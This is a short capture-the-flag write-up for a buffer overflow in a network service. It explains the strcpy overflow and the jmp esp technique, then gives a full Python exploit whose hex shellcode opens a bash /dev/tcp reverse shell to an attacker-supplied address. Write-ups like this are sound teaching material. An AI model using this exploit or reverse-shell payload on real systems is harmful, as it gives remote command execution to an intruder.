yabo
Yabo was a basic buffer overflow challenge with executable stack.
Files
The binary
The binary starts a listener on port 9999 and waited for input.
Buffer Overflow
The program copies the input to a 1024 bytes buffer with strcpy and thus has a buffer overflow vulnerability.
We can use a jmp esp gadget to jump to our shellcode and run it.
I used the following shellcode:
A simple /bin/sh shellcode wouldn't work since the remote process that receives the input is a fork, the shell will be popped on the server but won't receive input through the socket. With the shellcode I used, exploiting is as easy as appending the desired command to the shellcode, so I used a bash + /dev/tcp shell.
Final Exploit
#!/usr/bin/env python
from pwn import *
e = context.binary = ELF('./YABO',checksec=False)
if args.REMOTE:
io = remote('challenge.ctf.games',32762)
else:
io = remote('127.0.0.1',9999)
ip = sys.argv[1]
port = sys.argv[2]
buf = 1044*'A'
buf += p32(0x80492e2) # jmp esp
buf += "\x31\xc0\x31\xd2\xb0\x0b\x52\x66\x68\x2d\x63\x89\xe7\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\xeb\x06\x57\x53\x89\xe1\xcd\x80\xe8\xf5\xff\xff\xff\x62\x61\x73\x68\x20\x2d\x63\x20\x22\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f" + ip + "\x2f" + port + "\x20\x30\x3e\x26\x31\x22"
io.sendline(buf)
io.interactive()Last updated
Was this helpful?